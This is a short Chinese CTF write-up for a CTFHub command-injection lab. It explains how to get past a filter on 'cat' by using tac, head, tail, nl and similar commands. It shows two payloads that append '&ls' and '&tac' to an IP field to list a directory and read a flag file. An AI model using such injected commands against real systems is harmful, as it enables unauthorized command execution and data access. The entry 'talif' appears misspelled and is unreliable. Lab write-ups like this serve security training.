RCE7-文件包含/命令注入/过滤cat（&tac文件，倒序查看最后一行的文件内容）

一.题目链接：

https://www.ctfhub.com/#/skilltree

二.基础知识

2.1 如何绕过过滤cat

• 方法：
    1.cat -- 由第一行开始显示内容，并将所有内容输出
    2.tac -- 从最后一行倒叙显示内容，并将所有内容输出
    3.more -- 根据窗口大小，一页一页的实现文件内容
    4.less -- 和more类似，但优点是可以提前翻页，而且可以进行搜索字符
    5.head -- 只显示头几行
    6.tail -- 只显示最后几行
    7.nl -- 类似于cat -n,显示时输出行号
    8.talif -- 类似于tac来查看文件

三.开始解题

1.通过题目得知，cat已经被过滤，用tac方法代替它，倒序查看最后一行的内容

192.168.20.11&ls

2.通过别的方法代替cat，这里使用tac反向输出

192.168.20.11&tac flag_169782044929100.php